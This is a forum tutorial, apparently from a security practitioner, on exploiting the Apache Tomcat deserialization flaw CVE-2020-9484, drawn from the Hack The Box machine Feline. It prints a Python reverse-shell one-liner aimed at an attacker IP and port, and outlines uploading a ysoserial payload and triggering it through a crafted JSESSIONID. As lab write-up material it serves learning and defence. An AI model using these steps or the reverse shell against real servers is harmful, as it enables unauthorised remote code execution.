Hi Guys,
I want to share a tutorial on the Apache Tomcat vulnerability CVE-2020-9484; I would like to share based on the experience gathered from hack the box machine Feline.
This vulnerability impacted the Tomcat version below; all version before April 2020 are impacted
1. Apache Tomcat 10.x < 10.0.0-M5
2. Apache Tomcat 9.x < 9.0.35
3. Apache Tomcat 8.x < 8.5.55
4. Apache Tomcat 7.x < 7.0.104
In order to exploit this vulnerability there are some pre-requisites as below
1. The PersistentManager is enabled, and it’s using a FileStore
2. The attacker can upload a file with arbitrary content, has to control over the filename, and knows the location where it is uploaded
3. There are gadgets in the classpath that can be used for a Java deserialization attack
The vulnerability
1. Tomcat requests the Manager to check if a session with session ID “../../../../../../tmp/12345” exists
2. It will first check if it has that session in memory.
3. It does not. But the currently running Manager is a PersistentManager, so it will also check if it has the session on disk.
4. It will check at location directory + sessionid + ".session", which evaluates to “./session/../../../../../../tmp/12345.session“
5. If the file exists, it will deserialize it and parse the session information from it
below is the enumeration result from the server error message that the server using apache common file upload
Let’s analyze the error that leaked when we uploaded the file to the server using the application about the file path
To exploit the vulnerability, we need to do the below action. Here we are trying to create a reverse shell
We need to create shell.sh file to be uploaded to the server
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.42",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fi>
- Generate the serialized object file using ysoserial. With the command bleow we are transfering file from the attacker and copied to /dev/shm/
2. The next step is to upload the file to the server. We can use the functionality from the application
3. The last step is to run the uploaded file using the JSESSIONID. You need to set the path of the file location to the JSESSIONID without the .session
4. Now the shell.sh has been uploaded to the server
5. Now we need to create a serialization where to execute the shell.sh that has been uploaded to /dev/shm
6. We need to upload the session file to the server in order to be loaded to the java
6. We execute it again with the same mechanism above like point no 3
Don’t forget before you execute point no. 6, You need to start your netcat server to catch the reverse connection from the victim
resource https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 